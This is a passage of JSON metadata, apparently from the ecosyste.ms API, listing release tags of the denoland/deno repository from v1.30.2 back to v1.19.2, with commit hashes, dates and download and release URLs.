/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.